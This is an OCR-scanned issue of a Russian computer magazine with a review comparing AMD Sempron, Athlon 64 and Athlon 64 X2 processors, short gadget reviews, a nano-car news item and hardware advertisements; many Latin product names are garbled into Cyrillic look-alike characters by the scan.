мотора (коленчатый вал, поршни, шатуны и крейцкопфный механизм, кла- 
паны) хорошо уравновешены, так что вибрации практически нет. А коленвал 
вращается на настоящих шариковых подшипниках. Система зажигания ра- 
ботает от пьезо-кристалла, создающего высокое напряжение, так что ника- 
ких батареек не требуется. Для запуска достаточно повернуть кнопку (кран) 
на бачке и покрутить рукой маховое колесо. Г аз начнет впрыскиваться, свечи 
«сверкать», в общем — полный вперед. Можешь даже в свободное от работы 
время устанавливать его на велик — чтобы зря не пылился на столе. 




К нано-багги прикрутили мотор! 

Помнишь, в недавнем выпуске Имплан- 
та я рассказывал о четырехколесном 
нано-багги, который ездил по золотой 
плоскости? Так вот теперь хитрые ученые 
из университета Райса смогли прикрутить 
к этому девайсу настоящий двигатель. 

Для этого потребовалось переработать 
конструкцию багги: заменить фуллерены- 
колеса базовой рамы на молекулы кар- 
боранов, содержащие углерод, водород 
и бор. Ширина рамы наноавтомобиля — 4 
нанометра. Такая альтернативная конс- 
трукция позволила ученым «навесить мо- 
тор». Мотор машины представляет собой 
крестообразную лопасть, установленную 
в центре рамы, которая, вращаясь, от- 
талкивает ее от пола (все той же золотой 
подложки). Похоже это на принцип 
действия древних колесных пароходов, 
однако, несмотря надревность принципа 
действия, он все же остается довольно 
эффективным в наноразмерном диапазо- 
не. «Лопастной нанодвигатель», правда, 
нереверсивный — он может вращаться 
только в одну сторону, поэтому машинка 
будет ехать только вперед. Лопасти пита- 
ются световой энергией, поэтому управ- 
лять отдельными багги можно с помощью 
лазера. Такие машинки необходимы при 
организации молекулярных конвейеров и 
транспортных линий, которые перемеща- 
ют промежуточные продукты в нанофаб- 
риках будущего. Или же представь себе 
новое реалити-шоу: заезд на нано-багги 
по пересеченной местности:). 




АѴогМе сііа 



Смотри лучшее! 







АІѴЮ Зетргоп 3000+ 
АІѴЮ Зетргоп 3100+ 
АІѴЮ Зетргоп 3300+ 
АІѴЮ Зетргоп 3400+ 
АМО АіИІоп 64 3000+ 
АІѴЮ АіИІоп 64 3500+ 
АМО АІИІоп 64 Х2 3800+ 
АМР АіИІоп 64 Х2 4200+ 
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Тестовый стенд Зоскеі 939 

Материнская плата: ОідаВуІе ОА-К8І4Е-9, пРогсе4 

Кулер: АІѴЮ ВОХ 

Память, Мб: 1024, РС3200(400МІ12) РаШсЛ (Р8010400) 
Винчестер, Гб: 80, Зеадаіе Ваггасисіа, 7200грт 
Видеоплата: 256, АЗЕІЗ ЕЫ6600ѲТ НТО, РСІ-Е 
Оптический привод: АЗЕІЗ ОПѴѴ-1608Р 
Блок питания, Вт: 350, АсВеІ (АРІ4РС28) 

Тестовый стенд Зоскеі 754 

Материнская плата: ОідаВуІе (ЗА-К8І4Е пЕогсе4 

Кулер: АІѴЮ ВОХ 

Память, Мб: 1024, РС3200(400Міі2і) РаШсЛ (Р3010400) 
Винчестер, Гб: 80, Зеадаіе Ваггасисіа, 7200грт 
Видеоплата: 256, АЗЕІЗ ЕЫ6600ѲТ НТО, РСІ-Е 
Оптический привод: АЗЕІЗ ОРѴѴ-1608Р 
Блок питания, Вт: 350, АсВеІ (АРІ4РС28) 



ДРАГОЦЕННЫЕ КАМНИ / МАО 

Попов Евгений, ІезПаЬ (*е5ПаЬ@датеІапсІ.ги) 



Этот материал будет полезен в первую очередь тем, кто уже заранее определился с выбором типа платформы для 
своего будущего компа и склоняется больше к процессорам от компании АІѴЮ. Мы надеемся, что с помощью данно- 
го обзора, ты сможешь не только ознакомиться с предлагаемыми на рынке процессорами, но и узнать технологичес- 
кие особенности «камней». 

аспект _ . 

Обратим для начала свое внимание на динамику изме- чиная с осеннего периода и кончая февралем нынешнего 

нения цен на процессоры компании АІѴЮ. Вполне воз- года, цена на процессоры марки АІѴЮ выросла на 50-60 %. 

можно, ты заметил, как сильно подорожали «камешки» Сложившееся положение вещей может быть объяснено 

у конкурента Іпіеі, и засомневался в разумности выбора только высоким спросом на процессоры серии АІИІоп 64. 

процессоров именно этой марки. Постараемся разоб- Как следствие, образовался дефицит недорогих процес- 

раться в сложившейся ситуации. Итак, все мы привыкли соров АІѴЮ. Мало того, компания АМО столкнулась с 

к тому, что в связи с развитием технологий цены на проблемой подорожания кремниевых пластин на внутрен- 

«камни» должны падать. Появляются новые, более сов- нем рынке. Однако на данный момент цены упали до 

ременные, дорогие и мощные решения, и, соответствен- июльских, и ситуация более-менее стабилизировалась, 

но, на железо предыдущего поколения цены снижаются. так что причин для серьезного беспокойства нет. Сейчас 

Однако совсем недавно картина резко изменилась. В разумно брать именно процессоры АМО — конечно, пока 

прошлом году, вплоть до конца июля, цены на линейку не случился еще один катаклизм и, как следствие, силь- 

«камней» АМО АІИІоп 64 постепенно падали. Однако, на- ный рост цен. 

Технологии 

Поскольку в нашем тесте представлены процессоры трех подошли серьезнее. Размеры кэша І_2 повышены до 512 и 

марок, а именно: АМО АІИІоп 64 Х2, АМО АІИІоп 64 и АМО 1024 Кб в зависимости от модели. Их отличает от предыду- 

Зетргоп, то нам стоит разобраться в различиях между дан- щих «камешков» улучшенная 64-разрядная архитектура, 

ными типами «камней». Процессоры категории Зетргоп которая позволяет осуществлять обработку как 32-разряд- 

представляют собой наиболее доступный по ценовому кри- ных, так и 64-разрядных приложений. Выделяются они так- 

терию вариант. Его отличает небольшой объем кэша второ- же поддержкой и использованием таких широко известных 

го уровня — либо 128, либо 256 Кб в зависимости от типа технологий АІѴЮ, как СооІ ‘п’ Оиіеі и НурегТгапзроП. Здесь 

процессора. Изготовляются данные «камешки» под 754-й в основном используются ядра Зап йіедо (для более мощ- 

сокет, однако недавно появились более дорогие варианты ных процессоров) и Ѵепісе. Следующий класс процессоров 

под 939-й разъем. Соответственно, последний покупателю АМО АШІоп 64 Х2 представляет собой два процессора, од- 

выйдет дороже, но зато эстетам приятно. Построены СРІІ новременно интегрированных на один кристалл. Следова- 

Зетргоп на ядре Раіегто и, в принципе, похожи на давно тельно, такой СРІІ получает удвоенную производитель- 

известные АІИІоп ХР с измененной формулой расчета про- ность, особенно в многозадачном режиме. К сожалению, 

цессорного рейтинга. К созданию АІѴЮ АІИІоп 64 инженеры за это и заплатить придется приличные деньги. 

тестирования д ля тестирования был использован стандартный набор программ. Помимо синтетического бенчмарка 30 Магк 2005, 
были также задействованы ѴѴіпРаІ и ЗирегРІ. В качестве игрового приложения был выбран продукт НаІМіІе 2 — 
столь популярный среди геймеров всего мира. При этом разрешение было понижено до минимума 640x480, для 
наибольшей зависимости результата от процессора. Кроме того, с помощью утилиты Ѳогсііап Кпоі осуществлялась 
обработка видеопотока кодеком ОіѵХ 5.11 и сжатие аудиофайла в формат МРЗ кодеком І_ате. Тесты с разгоном 
осуществлялись по стандартной в таких случаях методике. Ступенчато повышалась частота РЗВ с последующей 
регулировкой подаваемого напряжения для получения максимального и вместе с тем стабильного результата. 

Те5і_ІаЬ выражает благодарность за предоставленное на тестирование оборудование компаниям: АЛИОН (т.(495)727-1818, \ллл/\л/.аІіоп.ги) . 
Графитек (\ллллл/.ага?іТес.ігО . а также российским представительствам компаний Рохсопп, М8І, СІпаіпіесІп, Согзаіг, пѴісІіа и АТІ, 
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АМР 

Зетргоп 3000+ 


АМР 

Зетргоп 3100+ 


АМР 

Зетргоп 3300+ 


мло 

Зетргоп 3400+ 


Частота работы, ГГц: 1,8 


Частота работы, ГГц: 1,8 


Частота работы, ГГц: 2 


Частота работы, ГГц: 2 


Кэш 1_2, Кб: 128 


Кэш І_2, Кб: 256 


Кэш І_2, Кб: 128 


Кэш І_2, Кб: 256 


Технология, мкм: 0.13 


Технология, мкм: 0,13 


Технология, мкм: 0,9 


Технология, мкм: 0,9 


Ядро: Раіегто 


Ядро: Раіегто 


Ядро: Раіегто 


Ядро: Раіегто 


Частота шины: 1600 


Частота шины: 1600 


Частота шины: 1600 


Частота шины: 1600 



Разъем: 754 Зоскеі 

$70 

★★★★★★★★★★ 

Начнем наш обзор с самой младшей 
модели в линейке камней АІѴЮ 
Зетргоп. Обладая серьезной часто- 
той в 1 ,8 ГГ ц, этот малыш способен 
составить серьезную конкуренцию су- 
ществующим бюджетным решениям. 
Слабый кэш не мешает данному уст- 
ройству показывать хорошие резуль- 
таты как в играх, так и в рабочих при- 
ложениях. Между тем, возможности 
ядра Раіегто и платформы Зоскеі 754 
делают свое дело, и на фоне тех же 
процессоров АІѴЮ АіЫоп ХР рассмат- 
риваемый камешек выглядит более 
уверенно. Очень слабый кэш данного 
устройства объемом в 1 28 Кб — это 
еще полбеды. Учитывая то, что АІѴЮ 
рассчитывает окончательно избавить- 
ся от 0,13 мкм процессоров в произ- 
водственной программе, то тут про- 
цессоры Зетргоп не являются исклю- 
чением. Выгоднее, на наш взгляд, 
выглядят «камешки» семейства АМ О 
АіЫоп 64, которые не только произво- 
дительнее и функциональнее, но и не 
сильно отличаются по цене — взять 
хотя бы тот же АІѴЮ АіЫоп 64 3000+ , 
который отличается от рассматривае- 
мой модели всего на пару десятков 
«зеленых президентов». 



Разъѳм: 754 Зоскѳі 

$75 

★★★★★★★★★★ 

Как ты можешь убедиться, изучив 
технические характеристики, этот 
«камень» не сильно отличается от 
предыдущего АІѴЮ Зетргоп 3000+, 
разве что инженерами был в два 
раза увеличен кэш второго уровня. 
Для данного процессора обеспечи- 
вается поддержка всевозможных: 
ІА-32, ЗЭпоѵѵ, епііапсесі ЗЭпоѵѵ, ЗЗЕ, 
ЗЗЕ2 и ММХ. АІѴЮ Зетргоп 3100+, 
как и предыдущий, имеет поддерж- 
ку технологии СооІ ‘п’ Оиіеі и анти- 
вирусной защиты, предоставленной 
ІЧХ-битом. Разгоняется этот СРІІ хо- 
рошо, благодаря тому, что является 
практически самым младшим в ли- 
нейке, так что оверклокерам есть, 
где разгуляться. 

К сожалению, в связи с особенностя- 
ми платформы с поддержкой Зоскеі 
754, контроллер памяти располагает- 
ся на процессоре, а не в чипсете. Так 
что стоит забыть о работе памяти в 
двухканальном режиме. 



Разъем: 754 Зоскѳі 

$96 

★★★★★★★★★★ 

Этот процессор — еще один предс- 
тавитель линейки Зетргоп в нашем 
тесте. К выпуску данного устройства 
производители материнских плат 
основательно подготовились. Ведь 
именно Зетргоп 3300+ за счет сво- 
его высокого множителя (10. 0х) поз- 
волит разогнать ядро Раіегто степ- 
пинга Е до частот свыше 2.6 ГГ ц. 
Дело в том, что большинство прода- 
ваемых до этого материнских плат 
под Зоскеі 754 не могут похвалиться 
возможностью гарантированной ра- 
боты на частоте тактового генерато- 
ра порядка 300 МГц. Такой высокий 
множитель снимает проблему, так 
как для достижения частоты 2,6 ГГ ц 
тот же Зетргоп 3300+ нужно будет 
разогнать «всего лишь» до 260 МГц 
по шине. Так что важность данного 
устройства для оверклокеров со 
скромными финансовыми возмож- 
ностями неоценима. 

Кэш второго уровня безжалостно 
урезан до 128 Кб, так что особо вы- 
дающейся производительностью 
этот «камешек» не блещет. До роли 
процессора под игровые платфор- 
мы данное устройство явно не дотя- 
гивает, а под бюджетные системы 
такой «камень» ставить дороговато. 



Разъем: 754 Зоскеі: 

$122 

★★★★★★★★★★ 

В последнее время стремительно 
растет ассортимент процессоров 
марки Зетргоп. Вот и пополнился 
он новой моделью АІѴЮ Зетргоп 
3400+. Причины, побудившие компа- 
нию АІѴЮ к такому шагу, вполне по- 
нятны. Процессоры АІѴЮ Зетргоп 
дают новую жизнь Зоскеі 754 и воз- 
можность сбыть со складов уста- 
ревшие марки материнских плат. 
Данный девайс, по сравнению с 
предыдущей моделью в линейке 
Зетргоп 3300+, обладает увеличен- 
ным объемом кэша второго уровня — 
256 Кб против 128 Кб в предыдущем 
варианте. Однако архитектура К8 не 
так выигрывает от увеличения объе- 
ма кэша, как от увеличения такто- 
вой частоты. Отсюда и такая разни- 
ца в рейтинговых «плюсах» назва- 
ния. Здесь процессоры отличаются 
всего на 100 единиц (старые модели 
имели разницу в 200 «плюсов»). Но- 
винки всегда бьют по карману пот- 
ребителя. Вот и теперь производи- 
тель не стремится снижать цены на 
новое, и в то же время устаревшее 
оборудование. 
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АМР 

АІМоп 64 3000+ 


АМР 

АІМоп 64 3500+ 

Везі Ьиу 


Частота работы, ГГц: 1,8 


Частота работы, ГГц: 1,8 


Кэш І_2, Кб: 512 


Кэш І_2, Кб: 512 


Технология, мкм: 0,9 


Технология, мкм: 0,9 


Ядро: Ѵепісе 


Ядро: Ѵепісе 


Частота шины: 1800 


Частота шины: 1800 


Разъем: 939 Зоскеі 


Разъем: 939 Зоскеі 


$105 


$170 


★★★★★★★★★★ 


★★★★★★★★★★ 



АМО 

АІМоп 64 3800+ 

ЕсіііоГз сГюізе 


АМР 

АІМоп 64 4200+ 


Частота работы, ГГц: 2 


Частота работы, ГГц: 2,2 


Кэш І_2, Кб: 2x512 


Кэш І_2, Кб: 2x512 


Технология, мкм: 0,9 


Технология, мкм: 0,9 


Ядро: МапсГіезІег (2 х Ѵепісе) 


Ядро: МапсГіезІег (2 х Ѵепісе) 


Частота шины: 2000 


Частота шины: 2000 


Разъем: 939 Зоскеі 


Разъем: 939 Зоскеі 


$330 


$400 


★★★★★★★★★★ 


★★★★★★★★★★ 



Имеются предположения, что мо- 
дель АІѴЮ АІЫоп 64 3000+ представ- 
ляет собой отбракованную версию 
процессора АІѴЮ АІЫоп 64 3200+, у 
которой по какой-то причине не за- 
работал 1 Мб кэша полностью. То 
же мы могли наблюдать и с процес- 
сорами семейства АІѴЮ Эигоп. Меж- 
ду тем радует то, что инженеры ком- 
пании АІѴЮ не стали изменять дру- 
гие параметры процессора, и в ос- 
тальном модель типа 3000+ ничем не 
отличается от модели 3200+ . И если 
бы не заниженный объем кэша, кото- 
рый все-таки влияет на производи- 
тельность, рассматриваемый процес- 
сор стал бы отличным выбором. Пос- 
кольку этот «камень» является самой 
младшей моделью в линейке АІГііоп 
64, то он обладает отличным разгон- 
ным потенциалом. Все радости сов- 
ременной жизни к процессору при- 
лагаются — 64-битная архитектура и 
поддержка СооІ ‘п’ Оиіеі. 

Не взирая на все достоинства данного 
процессора, назвать его игровым до- 
вольно сложно. Так что фанатам погони 
за РРЗ рекомендуется поискать что- 
то более мощное. 




Это — самый мощный процессор из 
представленных в тесте одноядерных 
«камней». Суди сам: при довольно вы- 
сокой частоте работы кристалла, дан- 
ное устройство обладает хорошим 
объемом кэша второго уровня — це- 
лый мегабайт. При этом он наделен 
всеми доступными на сегодняшний 
день технологиями от АІѴЮ — от 
нагревания процессор спасет СооІ ‘п’ 
Оиіеі, а ЫХ-бит станет отличным по- 
мощником твоему антивирусу. Между 
тем обрати внимание на разгонный 
потенциал данного устройства. Ко- 
нечно, тебе может попасться процес- 
сор, который будет гнаться хуже — 
это как повезет. Однако наш подо- 
пытный экземпляр дал 26-процент- 
ный прирост по производительности, 
что характеризует его с хорошей сто- 
роны. Особенным плюсом можно 
назвать его цену — на сегодняшний 
день данный процессор является от- 
личным выбором для ПК средней це- 
новой категории. 

Именно потому, что особенных ми- 
нусов замечено не было, и данное 
устройство показало себя с лучшей 
стороны, мы вручаем ему награду 
«Лучшая покупка» за оптимальное 
соотношение качества и цены. 




Данный процессор является самой 
младшей моделью в линейке двуя- 
дерных устройств от АІѴЮ, что не 
мешает ему показывать феноме- 
нальную производительность. Конт- 
ролеры памяти и шины Нурег 
Тгапзрогі у двуядерных процессоров 
АІѴЮ общие, стало быть, оба ядра 
делят их между собой. Особым плю- 
сом является возможность установ- 
ки таких процессоров на любую ма- 
теринскую плату, способную выдер- 
жать АІѴЮ АІГііоп 64 РХ. Правда, с 
предварительным апгрейдом ВІОЗ’а 
платы. Гонится такой девайс гораз- 
до лучше, в отличие от того же АІѴЮ 
АІГііоп 64 Х2 4200+ . Между тем все 
необходимые радости для высоко- 
технологичной жизни имеются — и 
поддержка 64-битного софта, и СооІ 
‘п’ Оиіеі, и ЫХ-бит. Между тем, у дан- 
ного процессора довольно низкий 
уровень тепловыделения, что понра- 
вится всем. 

Данный «камень» и попрекнуть не в 
чем — и разгоняется лучше стар- 
ших собратьев, и стоит не так доро- 
го, как мог бы. Поэтому, на наш 
взгляд, нет причин, чтобы не вручить 
ему премию «Выбор редакции» за 
самый лучший трудовой результат. 



Отличается от предыдущего собрата 
АІѴЮ Аібіоп 64 Х2 4200+ только час- 
тотой. Она на 0,2 ГГ ц больше, чем в 
предыдущем варианте. Это позволя- 
ет ему отлично справляться как со 
стандартными задачами, так и с 
мультизадачностью. Прикупив такой 
«камешек», не забудь обновить свой 
ВІ05 или заранее приобрести мате- 
ринскую плату с поддержкой двуя- 
дерных процессоров АІѴЮ. Иначе 
процессор будет работать только в 
половину своей могучей силы. Меж- 
ду тем, сам понимаешь, что такое 
устройство полностью экипировано 
всем необходимым инженерами, от 
СооІ ‘п’ Оиіеі до ЫХ-бита, так что ра- 
зочарованным ты не останешься. 
Такой процессор можно смело наз- 
вать НІ-ЕпсГом, ведь его цена 
действительно оправдывает это зва- 
ние. За такие деньги можно приоб- 
рести бюджетный системник. Одна- 
ко, может быть, кому-то это будет и 
по карману, поскольку за полгода 
процессоры под маркой Х2 успели 
солидно подешеветь — примерно 
на 35%. Так что если поднапрячься, 
можно взять и сейчас. 

Н 
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Выводы 



Все представленные в обзоре процессоры имеют свои слабые стороны, у одних — высокая цена, а у других — низкая производительность. 
Но, раздавая награды, мы старались быть объективными. Гражданам, подыскивающим недорогой процессор под домашнюю систему, сове- 
туем обратить внимание на варианты типа АІѴЮ АІЫоп 64 3000+ или АІѴЮ Зетргоп 3300+. Для машины категории «и поиграть, и поработать» 
рекомендуем победителя в номинации «Лучшая покупка» АІѴЮ АІЫоп 64 3500+. А желающим собрать сильный агрегат и при этом сэконо- 
мить отлично подойдет «камень» АІѴЮ АІЫоп 64 Х2 3800+, который мы наградили призом «Выбор Редакции». 
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Здесь был запущен непосредственно тест 
процессора, и, как мы видим, лидерство — 
за двуядерными процессорами. 

(лучше больше) 



8ілрег РІ, с 

Любимая программа оверклокеров 
по подсчету числа «пи» делает свое дело. 
Картина мало изменилась. Лидеры 
и аутсайдеры все те же. 

(лучше меньше) 



І-ате Аисііо, с 

Удивительно, но в этом тесте результаты как 
у АІѴЮ Зетргоп 3000+, так и у АІѴЮ АІЫоп 64 
3000+ практически равны! 

(лучше меньше) 



НІ.2, 640x480 

Даже в играх все призовые 
места заняты «камнями» АІЫоп 64. 

(лучше больше) 



РіѵХ 5.1 1, с 

От теста к тесту картина не меняется. 

Если же одновременно запустить несколько 
бенчмарков, то разрыв между двуядерными про- 
цами и всеми остальными только увеличится. 

(лучше меньше) 
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Разгон 

АМй АІЫоп 64 Х2 4200+ 
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Как ты можешь убедиться, разгонный потенциал 
напрямую зависит от типа модели в серии. 
Младшие разгоняются лучше, а старшие — хуже. 
Однако это не коснулось процессора АМЭ АІЫоп 
64 3500+. Он разогнался лучше всех вне 
зависимости от своего иерархического 
положения. А вот АМй АІЫоп 64 Х2 3500+ 
разогнался лучше своего собрата именно по этой 
причине — он самый младший в линейке Х2. 
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Двигайся в ногу со временем 



ШѴѴѴ.ІѴІТ.ІШ, ТЕЛ.: +(495) 970-1930 

У 



Обозначения Іпіеі, Іпіеі Іодо, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Репііит и Репііит Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 



Репііит* й 



тзіае 



Одноядерный процессор - это вчерашний день! 

Уже сегодня возможности ОДНОГО ПК АсІѵаІМТ АОЕ на базе нового ДВУХядерного Процессора Іпіеі® 
Репііит® О значительно шире! Новая ДВУХядерная обработка информации дает компьютеру 
дополнительную мощность там, где она нужна. Всего ОДИН компьютер позволяет Вашим детям играть 
в игры, в то время как Вы смотрите фотографии с ПК на экране ТѴ, качаете музыку и наслаждаетесь 

м/і/пиил і/і п^ііюимдАл о П Р Д паэз (л гл линю 







Зііісоп Роѵѵег Ехігете II 
Ц$В РІазИ Огіѵе 2 СЬ 

Емкость: 2048 Мб (2 Гб) 

Габариты: 69 х 25 х 1 0 мм 

Вес: 10_г 

Крутая 2 Гб флѳшка от Зііісоп Роѵѵег, которая работает быстрее всех. Особенности: крутой стильный корпус, мегаскоростной режим работы и большой объем 



і 



Результаты тестирования 
скорости флешки оказались умо- 
помрачительными: 20,9 Мбайт/с 
для чтения и 14,7 Мбайт/с для за- 
писи. Это реальный прорыв — 
такой скорости еще не было! 



Девайс выглядит очень стильно и 
красиво - черный блестящий 
корпус выделяется на фоне 
остальных флешек. Выглядит 
дорого, в стиле Гіі-епсІ - хороший 
подарок. 




По итогам испытаний с 
помощью программы РЮ ТасР 
2.61 время доступа для этой 
флешки составило 0,6 сек, что 
является очень хорошим 
результатом. 



Весит всего 10 граммов, а 
пластиковый корпус сделан 
очень качественно — ничего не 
хрустит, нет люфта у крышки и 
разъема ІІЗВ. 




Этот драйв, учитывая скорость 
работы и объем, легко сделает 
любой другой по соотношению 
цена/качество. Стоит флешка 
всего 109 баксов и скоро 
появится в продаже. 
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МРЗ-плѳер с прикольным стильным дизайном — идеально подходит 
девушкам. 



ВВК ОРРО Х9М 



Объем памяти, Мб: 


512 


Поддерживаемые форматы: 


МРЗ, ѴѴМА, ѴѴАѴ 


Дополнительно: 


РМ-тюнер, встроенный микрофон 


Соотношение сигнал/шум, дБ: 


90 


Время автономной работы, ч: 


~8 


Возможность обновить прошивку: 


есть 


Габариты, мм: 


46x31x14 


Вес, г: 


22 


Интерфейс: 


ІІЗВ 2.0 



і 



Благодаря новому аудиопроцес- 
сору РІпіІірз и продвинутой систе- 
ме ііііѳ ѴіЬез плеер выдает чис- 
тый и качественный саунд с 
хорошими басами, которым 
нужны качественные наушники. 



Органы управления и меню удоб- 
ны и просты в освоении — еще 
одна причина, чтобы подарить 
этот девайс своей девушке. Ей 
не придется долго париться над 
освоением нового устройства. 




По внешнему виду устройство 
напоминает драгоценную 
подвеску — отличный подарок 
для девушки. Он еще и очень 
стильный! 



Если записанная музыка вдруг 
надоест, можно включить радио 
- девайс оснащен ЕМ-тюнером. 
Также этот плеер может легко 
выполнять функции диктофона. 




Размеры гаджета вполне 
подходят для того, чтобы носить 
его на шее: 46x31x14 мм. Тем 
более весит он всего 22 грамма. 
Кстати, в комплекте имеется 
очень красивая цепочка. 
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В комплект поставки входит 
все необходимое: наушники, 
зарядное устройство, кабель 
для соединения с компом, 
драйвера, инструкция, а также 
силиконовый чехольчик. 




Звучание плеера можно легко и 
быстро подтюнить при помошщи 
очень мощного эквалайзера с 
кучей настроек. Поддерживается 
автоматическая смена профилей 
эквалайзера. 




Крутой кулер ОІасіаІІесІі — почти морозилка! 



СІасіаІІесН Ідіоо 5700МС 



Поддерживаемые разъемы: 


ЮА775 


В простое 


Материал радиатора: 


алюминий 


Максимум оборотов, гр: 


39 


Материал подошвы: 


медь 


Среднее количество оборотов: 


41 


Скорость, об/мин: 


1400-3100 


Минимум оборотов, гр: 


42 


Уровень шума, дБ: 


18-36 




Размеры радиатора, мм: 


93x102x135 


В нагрузке (8&М) 


Размеры вентилятора, мм: 


92x92x25 


Максимум оборотов, гр: 


55 


Скорость потока, СРМ: 


27,55-61 ,01 


Среднее количество оборотов, гр: 


61 


Наработка на отказ, ч: 


50000 


Минимум оборотов, гр: 


65 


Вес, г: 


570 






Регулятор скорости вращения: 


есть 







і 



Радиатор состоит из немереного 
количества алюминиевых плас- 
тин, по краям имеющим изогнутую 
форму для более качественного и 
тихого прохождения воздушного 
потока. 



С кулером поставляется регулятор 
скорости вращения, который 
монтируется в 3,5" отсек. Так что 
на твоей машине появится ручка, с 
помощью которой можно 
регулировать обороты. Приятно! 




Все это дело продувается 
мощным 92-миллиметровым 
вентилятором, который не 
позволит «камню» нагреться 
больше 60-ти градусов. 



На обратной стороне кожуха 
имеются крепежные отверстия 
для добавления еще одного 
вентилятора — на выдув. Для не 
по-детски разогнанного 
моддерского компа — актуально. 




Кулер легко устанавливается — 
достаточно наклеить с обратной 
стороны платы специальную 
пластину и ввернуть болты, 
находящиеся на креплении 
подошвы. 



6 



С помощью реобаса кулер 
может быть подключен как 
к стандартному разъему, 
так и к тоіех-коннектору. 




Кулер работает очень тихо даже на 
максимальном режиме работы, 
брлагодаря качесвенным 
подшипникам и продумаммой 
архитектуре. 
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Флѳш-плеер с функциями видеоплеера и сенсорной панелью вместо 
архаичных механических кнопок. 



ОІІМО еѵо 




Объем встроенной памяти: 


512Мб (1Г6/2Г6) 


Поддерживаемые форматы: 


МРЗ, ѴѴМА, АЗР, ООО, ОРЕО, МР4, ^0, ТХТ 


Габариты: 


82x40x1 3 мм 


Аккумулятор: 


12-Ро, 1 5 часов без подзарядки 


Вес: 


53,3 г 




У этого девайса нет привычных 
резиновых или пластиковых 
кнопок — все управление 
осуществляется при помощи 
качественной сенсорной панели. 



Вход І_іпе-іп делает возможным 
запись не только с любого 
источника Ііпе-оиі, но и 
с внешнего микрофона. 




2 стереодинамика, 
расположенные по бокам, 
позволяют обойтись без 
наушников (на тот случай, если 
тебе вдруг захочется, чтобы 
друзья заменили твою музыку). 




В нижней части, под резиновой 
крышкой, расположены разъемы 
618В и ІІЗВ-хост. С помощью 
последнего можно напрямую 
копировать файлы с любого 
другого ІІЗВ-устройства. 



Интересна также функция отоб- 
ражения текстовых файлов. 
Прокрутка осуществляется пост- 
рочно, постранично, а также в 
автоматическом режиме, с за- 
данным промежутком времени. 
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ОІІМО еѵо оснащен 1,6" І_СЭ- 
дисплеем с разрешением 
128x128 пикселей, способным 
показать 260 тысяч цветов. 




Плеер умеет проигрывать 
видеоформат МР4, 
конвертировать мувики в который 
можно при помощи программы, 
поставляемой вместе с гаджетом. 




Видеокарта на мощнейшем чипсете АТІ 
с водной системой охлаждения. 




Чипсет АТІ В580 содержит 
в себе 48 пиксельных 
процессоров — это 
обеспечивает охрененный 
прирост скорости по сравнению 
с предыдущим поколением ОРУ! 



В систему теплоотдачи 
включен красивый светящийся 
вентилятор — отличная находка 
для моддера. Будет круто 
смотреться в прозрачном 
корпусе! 
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ЗаррМге ВІіггагсІ Касіеоп XI 900 ХТХ 



Интерфейс: РСІ Ехргезз 



Ядро: 


АТІ В580 


Количество пиксельных конвейеров, шт: 


48 


Шина памяти, бит: 


256 


Объем памяти, Мб: 


512 


Частота ядра, МГ ц: 


650 


Частота памяти, МГ ц: 


1550 


Тип памяти: 


ООРВ-3 


Выходы: 


2хРѴІ, 5-ѴісІео 



512 Мб памяти типа ОЮЭЯЗ — 
высочайший объем, 
достаточный для игр 
с текстурами практически 
любой сложности. 



Можно управлять скоростью 
вращения вентилятора 
на теплообменнике: 
доступны режимы 2000 об/мин 
и 2500 об/мин. 
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Блок охлаждения состоит из 
резервуара с жидкостью, 
12-вольтового насоса и 
радиатора. Этот механизм 
обеспечивает сверхэффек- 
тивное охлаждение. 



Систему не надо заполнять 
хладагентом — она поставляется 
уже заправленной, так что 
остается только установить. 
Предусмотрена возможность 
замены жидкости. 
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Модули памяти охлаждаются 
отдельными радиаторами. 
Имеется полная поддержка 
технологии аѴІѴО — видео можно 
как выводить, так и вводить 
в отличном качестве. 
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В комплектацию входит двухслой- 
ный ДВД с набором Заррбіге 
Зеіесі, который включает в себя 
несколько полных версий игр, ак- 
тивируемых через Интернет. 
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ВЫСОКАЯ 

ПРОИЗВОДИТЕЛЬНОСТЬ 
И НАДЕЖНОСТЬ 



Компьютер ФРОНТ Т-90 (400) на базе двухъядерного процессора 
Іпіеі® Репііит® й обеспечивает высочайшую производительность 
для выполнения многозадачных приложений. 




Репііит О 

ІП5Ібё* 




Обозначения ВиппуРеорІе, Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, логотип Сепігіпо, Сііірз, Соге Іпзісіе, Оіаіодіс, ЕібегЕхргезз, ЕТОХ, РІазТіРіІе, І386, І486, І960, ЮОМР, ІпзіапіІР, Іпіеі, логотип Іпіеі, ІпІеІ386, Іп(еІ486, ІпіеІ740, ІпіеГОХ2, ІпіеЮХ4, ІпіеІЗХ2, Іпіеі Соге, Іпіеі Іпзісіе, 
логотип Іпіеі Іпзісіе, Іпіеі. 1_еар аііеасі., логотип Іпіеі. І_еар аітеасі., Іпіеі ІМеіВигзі, Іпіеі І4еіМегде, Іпіеі №131гис1иге, Іпіеі ЗіпдІеОгіѵег, Іпіеі ЗреебЗІер, Іпіеі ЗігаіаРІазіі, Іпіеі Ѵііѵ, Іпіеі ХЗсаІе, ІРЫпк, Ііапіит, Ііапіит Іпзісіе, МСЗ, ММХ, логотип ММХ, логотип Оріітігег, 
ОѵегОгіѵе, Рагадоп, РОСііагт, Репііит, Репііит II Хеоп, Репііит III Хеоп, Регіогтапсе аі Уоиг Соттапб, Репііит Іпзісіе, зкоооі, ЗоипсІ Магк, Тііе Сотриіег Іпзісіе., ТНе Зоигпеу Іпзісіе, ѴТипе, Хеоп и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными 
товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 





зіагі ■ 



Рс_2опе/ 

Живые^грь 

В Интернете существует большое 
число интерактивных проектов 
и опііпе-игр. Каждый такой проект 
приносит создателям миллионы 
долларов прибыли и представ- 
ляет собой довольно сложную 
сетевую систему. Сегодня мы 
попробуем разобраться с тем, 
как работают такие проекты на 
примере популярной английской 
игры Зііепі Мападег, которая 
недавно появилась и в России. 







Пользователь набирает 
в ІЕ ѵѵѵѵѵѵ.іоіаІ-ЬоШаІІ.ги. и 
браузер посылает запрос 
провайдерскому пз-серверу. 



На сервере пз.аатеіапсі.ги хранится 
запись для домена. Указывает на 
209.10.22.4, сервер хостится в 
английской сети аІоЬіх.пеІ 
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Проект \ллллл/.іоІаИооіЬаІІ. ги был создан 
довольно быстро. У английской компании 
